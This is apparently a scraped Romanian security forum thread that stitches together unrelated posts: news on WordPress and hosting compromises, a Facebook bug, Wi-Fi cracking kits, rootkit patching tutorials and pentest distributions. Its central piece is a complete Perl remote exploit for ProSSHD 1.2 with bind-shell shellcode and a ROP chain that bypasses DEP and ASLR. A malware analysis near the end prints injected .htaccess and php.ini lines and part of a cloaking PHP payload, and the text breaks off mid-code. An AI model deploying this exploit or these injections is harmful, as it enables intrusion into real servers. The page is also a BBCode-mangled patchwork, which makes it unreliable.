begood

keep them coming ! (toata lumea poate contribui, nu doar nytro.) se admite dublu post in acest thread. atentie : vreau doar programe folosite de voi, nu aruncati orice la plesneala.

Am decis s? creez o imagine Virtual Box pentru a veni în ajutorul pentesterilor, celor pasiona?i de analiza & detec?ia viru?ilor ?i nu numai. O scurt? descriere : O imagine Virtual Box este o versiune virtual? a unui sistem de operare, un emulator. Versiunea v0.1 alfa (actuala) con?ine Windows XP SP3, îmbun?t??it cu minimul necesar de programe ?i tweak-uit pentru o securitate optim?, al?turi de o stabilitate ridicat? a sistemului de operare. Consumul de RAM este minim pentru o performan?? ridicat?. Dup? cum am precizat mai sus, aceasta este prima versiune, înc? în stadiul de testare. Pe m?sur? ce va evolua proiectul, vom oferi o gam? variat? de versiuni, optimizate pentru diverse domenii : programare, pentesting, recovery, malware analysis etc. Mai multe detalii al?turi de o prezentare video pute?i g?si pe blogul meu : a2480f25: Windows XP SP3 RSTCore Edition v0.1 Cine dore?te prima versiune, s?-mi trimit? pm ?i va primi un fi?ier torrent. UPDATE 2012 : http://docs.rtfm.us/Users/begood/rstcore/ http://filecloud.io/yezs78ga http://filecloud.io/jw73a049 http://filecloud.io/mb8tox26 http://filecloud.io/s28zuykd http://filecloud.io/n8vx7c31 http://filecloud.io/6m0qrdk5 http://filecloud.io/24ydtjkh

Aici voi posta update-uri despre proiectul la care lucrez acum, "RSTcore Project".

Kernel32.dll is a dynamic link library present in all 32-bit and 64-bit versions of Microsoft Windows. It exposes to applications most of the Win32 base APIs, such as memory management, input/output operations, (process and thread) creation, and synchronization functions. In this video Spiffomatic64 shows us how to patch Kernel32 by using OllyDbg. He demonstrates the power of patching with a simple example where he swaps filenames in a function call with the DLL. The patching mechanism works by putting an unconditional jump instruction in the beginning of the function to be patched and then points the jump to a location in the .text segment where the attacker's code resides. Once the attacker's code is executed, control is transfered back to the original function code. Of course, the attacker's code needs to ensure that all the state (registers, flags etc) are saved before his code executes and then restored back to their original state before returning control to the original function code. He also needs to execute the code he replaced with the unconditional jump instruction before passing control back. This will ensure that the system does not crash or behave unexpectedly when control is given back. Spiffomatic64 demos this entire process in depth and detail. This video is very important in understanding rootkits, as most of them use similar techniques to take control and camouflage their presence in an infected system. There is a fair bit if assembly language involved in this video. If you are unfamiliar with Assembly Language programming, then begin with the 12 part Assembly Language Primer for Hackers which we created a while back. It is important to note that our tutorial used the AT&T syntax while this video uses the Intel syntax for Assembly language. Thanks go out to Spiffomatic64 for submitting this video to SecurityTube. You can visit his site here. This is recommended watch for people interested in rootkits and other malware. Patching Kernel32 for Fun and Profit Tutorial

interesant mai e netu asta. [uploaded: December 03, 2009]

fara limbaj de messenger. fara culori si fara caps on.

Update 2: Simple clean up solution: Sucuri Security: Simple cleanup solution for the latest Wordpress hack Update 1: Note that we are not blaming Wordpress here. I am assuming that if the problem was on Wordpress itself, the number of infected sites would be much much bigger. Maybe a plugin is vulnerable or someone stole lots of passwords. Also, all the hacked sites were on shared hosts, no one so far on a private server. We are seeing multiple reports today of Wordpress sites (running their latest version) getting compromised. The initial reports today were restricted only to Dreamhost, but now we are seeing the same pattern on blogs hosted at GoDaddy, Bluehost, Media temple and other places. So, it doesn't look like something specific to a hosting company. The only thing in similar is that all of them are on shared servers. All those sites had this javascript added to their pages: http://www.indesignstudioinfo.com/ls.php http://zettapetta.com/js.phpWhich came from a long base64 encoded string added to their footer.php file (or on all the PHP files in some cases). You can get more information about the encoded string here (and the final decoded code): Sucuri Security One thing very interesting that is becoming a trend is that the malware is also hiding from Google. This causes the site to do not get blacklisted, making it harder for the owner to notice. People are talking on the forums already: WordPress › Support 2.9.2 site hacked http://www.webhostingtalk.com/showthread.p.. http://collabtive.o-dyn.de/forum/view.. How are they getting hacked? We have no clue yet... We can only restrict to a few issues: Stolen FTP/WP password Bug on Wordpress Bug on some Wordpress plugin Brute force attack against the passwords Send us more information if you know something. The guys from WP security lock did a good thread on the issue. You can read here Sucuri Security: New attack today against Wordpress

Just a few days after the bug that let users see their friends' personal chats, another Facebook bug has been discovered yesterday, and this one was adding applications to your Facebook profile without your knowledge or authorization. If you surf to sites that have Facebook integration while you are logged in to Facebook, chances are your profile has had a few of those added. Facebook spokesman David Swain said to Macworld that the bug has been fixed and that no information was shared with those applications, but it remains to be seen if Facebook will notify every user - since the only way to remove these unauthorized applications is to do it manually. Also, the question is: do you trust Facebook when it tells you that no information was shared? How would you know if it was? To remove the unauthorized applications, go to your Facebook Account details (top right corner), select the Application Settings option from the drop-down menu and delete unwanted applications by clicking on the "X" mark. I would also recommend editing the settings for those applications you want to keep using - browse through them and see what you want to share with whom and what do you permit the application to do. These latest privacy changes have wreaked havoc on Facebook, so this is the right time to consider which information could be too sensitive to be provided in your account. New Facebook bug adds unauthorized apps to your profile

http://rstcenter.com/forum/22355-technique-quick-exploitation-double-blind-sql-injection.rst

Rogue = fake (in cazul asta) Oare e intentionat denumit RST ?

RST Antivirus 2010 is a rogue security application. In order to remove it, find out what files and registry entries to look for below. Known system changes: Files c:\Desktop\RST Antivirus 2010.lnk Folders c:\StartMenu\RST Antivirus 2010 c:\ProgramFiles\RST Antivirus 2010 Registry entries Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Uninstall\{0933F968-51E5-4780-B485-CE2DCE47E8F6} // RST antivirus, CE PULA MEA ?

About GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat. It ultimately aims to provide a level of anonymity that will prevent Google from tracking your searches, movements, and what websites you visit. GoogleSharing is not a full proxy service designed to anonymize all your traffic, but rather something designed exclusively for your communication with Google. Our system is totally transparent, with no special "alternative" websites to visit. Your normal work flow should be exactly the same. The Basic Problem Google thrives where privacy does not. If you're like most internet users, Google knows more about you than you might be comfortable with. Whether you were logged in to a Google account or not, they know everything you've ever searched for, what search results you clicked on, what news you read, and every place you've ever gotten directions to. Most of the time, thanks to things like Google Analytics, they even know which websites you visited that you didn't reach through Google. If you use Gmail, they know the content of every email you've ever sent or received, whether you've deleted it or not. They know who your friends are, where you live, where you work, and where you spend your free time. They know about your health, your love life, and your political leanings. These days they are even branching out into collecting your realtime GPS location and your DNS lookups. In short, not only do they know a lot about what you're doing, they also have significant insight into what you're thinking. Where GoogleSharing Comes In GoogleSharing is a system that mixes the requests of many different users together, such that Google is not capable of telling what is coming from whom. GoogleSharing aims to do a few very specific things: Provide a system that will prevent Google from collecting information about you from services which don't require a login. Make this system completely transparent to the user. No special websites, no change to your work flow. Leave your non-Google traffic completely untouched, unredirected, and unaffected. The GoogleSharing system consists of a custom proxy and a Firefox Addon. The proxy works by generating a pool of GoogleSharing "identities," each of which contains a cookie issued by Google and an arbitrary User-Agent for one of several popular browsers. The Firefox Addon watches for requests to Google services from your browser, and when enabled will transparently redirect all of them (except for things like Gmail) to a GoogleSharing proxy. There your request is stripped of all identifying information and replaced with the information from a GoogleSharing identity. This "GoogleShared" request is then forwarded on to Google, and the response is proxied back to you. Your next request will get a different identity, and the one you were using before will be assigned to someone else. By "sharing" these identities, all of our traffic gets mixed together and is very difficult to analyze. The GoogleSharing proxy even constantly injects false but plausible search requests through all the identities. The result is that you can transparently use Google search, images, maps, products, news, etc... without Google being able to track you by IP address, Cookie, or any other identifying HTTP headers. And only your Google traffic is redirected. Everything else from your browser goes directly to its destination. GoogleSharing Transport Where Google has failed to provide universal HTTPS support, we have. All requests to a GoogleSharing proxy are sent via HTTPS. These eventually have to be proxied out as HTTP from GoogleSharing to Google, but your traffic is encrypted on the first path. Running A GoogleSharing Proxy We've made the proxy code available so that anyone can run a GoogleSharing proxy instance in addition to the one that we're running. GoogleSharing :: A Special Kind Of Proxy

//sau asa.

# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)[/SIZE][SIZE=2]# Date: 03.05.2010[/SIZE] [SIZE=2]# Author: Alexey Sintsov[/SIZE] [SIZE=2]# Software Link: [URL]http://www.exploit-db.com/application/11618[/URL][/SIZE] [SIZE=2]# Version: 1.2[/SIZE] [SIZE=2]# Tested on: Windows XP SP3 / Windows 7[/SIZE] [SIZE=2]# CVE : [/SIZE] [SIZE=2]# Code : [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]################################################################################[/SIZE] [SIZE=2]# Original exploit by S2 Crew [Hungary] [/SIZE] [SIZE=2]# * * *[/SIZE] [SIZE=2]# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [[URL="http://www.dsecrg.com]/"]www.dsecrg.com][/URL][/SIZE] [SIZE=2]# * * *[/SIZE] [SIZE=2]# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all[/SIZE] [SIZE=2]# [/SIZE] [SIZE=2]# Special for XAKEP magazine [[URL="http://www.xakep.ru]/"]www.xakep.ru][/URL][/SIZE] [SIZE=2]#[/SIZE] [SIZE=2]#[/SIZE] [SIZE=2]# CVE: - [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]#!/usr/bin/perl [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]use Net::SSH2; [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]$username = ''; [/SIZE] [SIZE=2]$password = ''; [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]$host = '192.168.126.129'; #Remote host[/SIZE] [SIZE=2]#$host = '192.168.13.6'; [/SIZE] [SIZE=2]$port = 22; [/SIZE] [SIZE=2] [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]# windows/shell_bind_tcp - 368 bytes[/SIZE] [SIZE=2]# [URL="http://www.metasploit.com/"]http://www.metasploit.com[/URL][/SIZE] [SIZE=2]# Encoder: x86/shikata_ga_nai[/SIZE] [SIZE=2]# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=, [/SIZE] [SIZE=2]# AutoRunScript=[/SIZE] [SIZE=2]$shell = [/SIZE] [SIZE=2]"\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9" .[/SIZE] [SIZE=2]"\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26" .[/SIZE] [SIZE=2]"\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8" .[/SIZE] [SIZE=2]"\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c" .[/SIZE] [SIZE=2]"\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5" .[/SIZE] [SIZE=2]"\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95" .[/SIZE] [SIZE=2]"\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff" .[/SIZE] [SIZE=2]"\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae" .[/SIZE] [SIZE=2]"\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96" .[/SIZE] [SIZE=2]"\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9" .[/SIZE] [SIZE=2]"\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde" .[/SIZE] [SIZE=2]"\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68" .[/SIZE] [SIZE=2]"\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e" .[/SIZE] [SIZE=2]"\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1" .[/SIZE] [SIZE=2]"\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b" .[/SIZE] [SIZE=2]"\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03" .[/SIZE] [SIZE=2]"\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2" .[/SIZE] [SIZE=2]"\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3" .[/SIZE] [SIZE=2]"\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7" .[/SIZE] [SIZE=2]"\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef" .[/SIZE] [SIZE=2]"\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea" .[/SIZE] [SIZE=2]"\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb" .[/SIZE] [SIZE=2]"\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54" .[/SIZE] [SIZE=2]"\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e" .[/SIZE] [SIZE=2]"\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24" .[/SIZE] [SIZE=2]"\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb" .[/SIZE] [SIZE=2]"\x38\x1e\x51\xde";[/SIZE] [SIZE=2] [/SIZE] [SIZE=2] [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]$fuzz = "\x41"x491 . # buffer before RET addr rewriting[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]############################### ROP [/SIZE] [SIZE=2]# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL [/SIZE] [SIZE=2]# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)[/SIZE] [SIZE=2]# this make stack executable:[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]#### RET rewrite###[/SIZE] [SIZE=2]"\x9F\x07\x37\x7C". # MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\x11\x11\x11\x11". # JUNK---------------^^^ ^^^ [/SIZE] [SIZE=2]"\x22\x22\x22\x22". # JUNK-------------------------^^^ [/SIZE] [SIZE=2]"\x27\x34\x34\x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10[/SIZE] [SIZE=2]"\x33\x33\x33\x33". # JUNK------------------------------^^^ [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xC1\x4C\x34\x7C". # POP EAX / RETN[/SIZE] [SIZE=2] # ^^^ [/SIZE] [SIZE=2]"\x33\x33\x33\x33". # ^^^[/SIZE] [SIZE=2]"\x33\x33\x33\x33". # ^^^[/SIZE] [SIZE=2]"\x33\x33\x33\x33". # ^^^[/SIZE] [SIZE=2]"\x33\x33\x33\x33". # ^^^[/SIZE] [SIZE=2] # ^^^[/SIZE] [SIZE=2]"\xC0\xFF\xFF\xFF". # ----^^^ Param for next instruction...[/SIZE] [SIZE=2]"\x05\x1e\x35\x7C". # NEG EAX / RETN ; EAX will be 0x40 (param for VirtualProtect)[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xc8\x03\x35\x7C". # MOV DS:[ECX], EAX / RETN ; save 0x40 (3 param)[/SIZE] [SIZE=2]"\x40\xa0\x35\x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN ; Change position[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN [/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN ; EAX=ECX-0x0c[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\x08\x94\x16\x7C". # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN ; oh ... and move pointer back[/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN[/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN[/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN ; EAX=ECX=0x8[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xB2\x01\x15\x7C". # MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN ; Change position for output from VirtualProtect[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN [/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2]"\xA1\x1D\x34\x7C". # DEC EAX / RETN[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\x27\x34\x34\x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10[/SIZE] [SIZE=2]"\x33\x33\x33\x33". # JUNK------------------------------^^^ [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\x40\xa0\x35\x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX [/SIZE] [SIZE=2] # [/SIZE] [SIZE=2]"\x33\x33\x33\x33". # [/SIZE] [SIZE=2]"\x33\x33\x33\x33". # [/SIZE] [SIZE=2]"\x33\x33\x33\x33". # [/SIZE] [SIZE=2]"\x33\x33\x33\x33". # [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN ; and again... [/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN[/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN[/SIZE] [SIZE=2]"\xB9\x1F\x34\x7C". # INC EAX / RETN[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xE5\x6B\x36\x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xBA\x1F\x34\x7C"x204 . # RETN fill.....[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\xDD\x28\x35\x7C". # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN ;Call VirtualProtect [/SIZE] [SIZE=2]"AAAABBBBCCCCDDDD". # Here is place for params (VirtualProtect) [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]####################### retrun into stack after VirtualProtect[/SIZE] [SIZE=2]"\x1A\xF2\x35\x7C". # ADD ESP, 0xC / RETN ; take next ret [/SIZE] [SIZE=2]"XXXYYYZZZ123". # trash[/SIZE] [SIZE=2]"\x30\x5C\x34\x7C". # 0x7c345c2e: ANDPS XMM0, XMM3 -- (+0x2 to address and....) --> PUSH ESP / RETN ; EIP=ESP[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]"\x90"x14 . # NOPs here is the begining of shellcode[/SIZE] [SIZE=2] [/SIZE] [SIZE=2]$shell; # shellcode 8)[/SIZE] [SIZE=2] [/SIZE] [SIZE=2] [/SIZE] [SIZE=2]$ssh2 = Net::SSH2->new(); [/SIZE] [SIZE=2]$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n"; [/SIZE] [SIZE=2]$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; [/SIZE] [SIZE=2]#sleep(10);[/SIZE] [SIZE=2]$scpget = $ssh2->scp_get($fuzz); [/SIZE] [SIZE=2]$ssh2->disconnect();

WeakNet is actively updating its database and tools. This being a reason, a new version of WeakNet is available. It is WeakNet version 4! Our first post regarding Weaknet can be found here. “WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks.” This is the official change log: - Weakerthan kernel version 1.0 - Technician utilities (i am a computer tech for dell and apple and these utilities help out immensely on a daily basis.) - More wireless penetration utilities, including FreeRADIUS WPE edition, AIRPWN, properly recompiled custom Kismet - Better wireless adapter support for penetration testing with Ath9k, Ath5k, Rt73USB, and now Broadcom drivers have been patched for injection as well. - Autoload of X windows (Fluxbox) but no GDM (faster loading and boot time) - More non-hacker-pentest applications (all of these are accessed from right clicking anywhere on the fluxbox desktop) - More custom designed assistant applications to help those in need of wifi help and networking help, but without the bloated services like wicd or network-manager, etc. - More networking utilities for clients, including vnc, filezilla, and more. - Better MITM support and applications, including auto scanning for hosts via a custom made GUI application (the custom made GUI apps are all perl/Tk so they take up not a lot of resources.) - No instant servers are automatically started (for faster boot time) the user can simply start them right from the desktop menu. - There is a laptop theft-lojack-like application which reveals the external IP and can be set up easily from the desktop menu to automatically Email a specified address the table results each hour. *** - There are much more additions and modifications to the Web Hacking Portal - This version’s automatic user is “root” - VLC is included in this lite ISO, custom compiled to be ran as root. - A new GUI battery status interface I coded, - Just about everything’s theme has been updated and ISOLINUX looks much better than before with a custom splash image. - The new browser is Google Chrome – not Firefox3.5. - I completely filled the bookmarks bar in Google Chrome with TONS of security related links, technician links, developer links and more. - RAV hunter (Rogue av client finder) - SAM Hunter (automatic retrieval of SAM file for usage with chntpw to blank out administrator passwords on windows machines) UPDATE: WeakNet v4! ? PenTestIT Download WeakNet Linux 4.0 for Linux - An Ubuntu-based Live DVD containing a variety of security tools. - Softpedia

Dodgy salesmen in China are making money from long-known weaknesses in a Wi-Fi encryption standard, by selling network key-cracking kits for the average user. Wi-Fi USB adapters bundled with a Linux operating system, key-breaking software and a detailed instruction book are being sold online and at China's bustling electronics bazaars. The kits, pitched as a way for users to surf the Web for free, have drawn enough buyers and attention that one Chinese auction site, Taobao.com, had to ban their sale last year. Internet censorship in China: The conventional view With one of the "network-scrounging cards," or "ceng wang ka" in Chinese, a user with little technical knowledge can easily steal passwords to get online via Wi-Fi networks owned by other people. The kits are also cheap. A merchant in a Beijing bazaar sold one for 165 yuan ($24), a price that included setup help from a man at the other end of the sprawling, multistory building. The main piece of the kits, an adapter with a six-inch antenna that plugs into a USB port, comes with a CD-ROM to install its driver and a separate live CD-ROM that boots up an operating system called BackTrack. In BackTrack, the user can run applications that try to obtain keys for two protocols used to secure Wi-Fi networks, WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access). After a successful attack by the applications, called Spoonwep and Spoonwpa, a user can restart Windows and use the revealed key to access its Wi-Fi network. To crack a WEP key, the applications exploit weaknesses in the protocol that have been known for years. For WPA, they capture data being transmitted over the wireless network and target it with a brute-force attack to guess the key. Security researchers said they did not know of similar kits sold anywhere besides China, even though tutorials on how to crack WEP have been online for years. The kits appear to be illegal in China and it is unclear who is bundling the software with the USB adapters. One of the adapter makers is Wifly-City, a company that operates a Wi-Fi network covering coffee shops and other areas in Taipei, Taiwan. A woman surnamed Ren who answered the phone at the company said it does not supply the software that often appears with its products. A developer of BackTrack said the operating system is meant for penetration testing, not malicious attacks. "It sounds like BackTrack is being abused in China for illegal purposes. This is done without our knowledge or approval," the developer, who goes by the name Muts, said in an e-mail. One of the kits took over an hour to crack the WEP key equivalent to the password "sugar" in a test attack on a personal router set up for the purpose using 40-bit encryption. "Depending on many factors, WEP keys can be extracted in a matter of minutes," Muts said. "I believe the record is around 20 seconds." The brute-force attacks on WPA encryption are less effective. But while WEP is outdated, many people still use it, especially on home routers, said one security researcher in China. That means an apartment building is bound to have WEP networks for a user to attack. Since the kits capture data packets to perform their attacks, they may also let a user steal sensitive personal information that a victim sends over a network, the researcher said. The kits have stayed popular despite Chinese laws against hacking. "No matter where you go, you can use the Internet for free," the researcher said. Wi-Fi key-cracking kits sold in China mean free Internet

Tu n-ai legatura cu acele site-uri, nu iti apartin. Ai pus userii sa verifice daca sunt vulnerabile sau nu, iar asta in cartea mea e request. E posibil sa ma fi luat valul, au fost 3 indivizi azi care au sarit cu "imi spargi si mie site-ul" toate la hacking challenges. Puteai sa-mi atragi atentia prin private message, si se rezolva daca imi explicai care au fost intentiile tale. Tu ai pus doar un titlu si 3 linkuri. Daca tie ti-a fost greu sa explici acolo ce intentionezi, apoi atunci de ce m-as justifica eu?

Update: We just heard back from Network solutions and they explained the issue to us. It is also related to the US Treasury Department hack, because they are hosting at Netsol and got infected too. On their own words: "This past weekend, an application that we support on our hosting platform was exploited as we were in the process of fixing it. We believe we have fixed the issue and we were able to contain the number of potentially affected websites to less than 250." So the problem seems to be fixed and only 250 sites got hacked. Not too bad for a company of their size. I also have to point out that Network Solutions response to this (and to the previous) incident was very good. They took responsibility, kept everyone updated and worked hard to fix the sites involved. There is never going to be a perfect secure hosting solution (bugs happen), but being able to respond quickly is what we always want to see. Yes, I am tired of reporting those as you are probably tired of hearing them as well. But today we got reports from multiple site owners of new infections at Network Solutions. Some of them were using Wordpress, but some were not. So nobody can blame Wordpress this time. In fact, we just finished fixing a few of these sites and we have some info to share. *btw, some of them were hacked on the previous batch, but some were not. No correlation here. **I am not 100% sure of how this is happening. Different sites, different platforms, most of them updated. The only thing weird is that their cgi-bin had the drwxrws--x (suid bit checked). I will post an update when I get more info. Attack analysis This attack is happening in two ways: 1- A new php.ini is created inside the cgi-bin directory. It looks like this: auto_append_file = /data/xx/yy//user/abc/cgi-bin/root 2- A new .htaccess is created (or modified) to load a new php file: RewriteRule ^(.*)\.html$ /data/xx/user/yy/htdocs/file.php [L] RewriteRule ^(.*)\.htm$ /data/xx/user/yy/htdocs/file.php [L]Note that I am hiding the original paths to protect the innocent. Also, the "file.php" from the second case had different file names on each case. The "root" file inside the cgi-bin looks like the "counter.cgi" that we saw previously. The file.php is very interesting and you can see the full content here: http://sucuri.net/malware/MW:GREPADD:2. It not only checks if the request is coming from a bot, but also the operating system (Linux, FreeBSD, etc) and only displays the malware on certain cases: function detect_os() { global $os; $user_agent = $_SERVER['HTTP_USER_AGENT']; if ((eregi("Google", $user_agent)) or (eregi("gsa-crawler", $user_agent)) or (eregi("Yahoo", $user_agent)) or (eregi("msnbot", $user_agent)) or (eregi("Turtle", $user_agent)) or (eregi("Yandex", $user_agent)) or (eregi("YaDirectBot", $user_agent)) or (eregi("Rambler", $user_agent)) or (eregi("James Bond", $user_agent)) or (eregi("Ask Jeeves", $user_agent)) or (eregi("Baiduspider", $user_agent)) or (eregi("EltaIndexer", $user_agent)) or (eregi("GameSpyHTTP", $user_agent)) or (eregi("grub-client", $user_agent)) or (eregi("Slurp", $user_agent)) or (eregi("Pagebull", $user_agent)) or (eregi("Scooter", $user_agent)) or (eregi("Nutch", $user_agent)) or (eregi("Zeus", $user_agent)) or (eregi("WebAlta", $user_agent)) or (eregi("Wget", $user_agent)) or (eregi("bot", $user_agent)) or (eregi("ia_archiver", $user_agent))) {$os = "Bots";} elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95"; elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4"; elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98"; elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME"; elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000"; elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP"; elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003"; elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista"; elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7"; elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE"; elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS"; elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS"; elseif (ereg("Linux", $user_agent)) $os = "Linux"; elseif (ereg("SunOS", $user_agent)) $os = "SunOS"; elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD"; elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD"; elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC"; elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC"; elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS"; elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation"; elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii"; elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS"; elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile 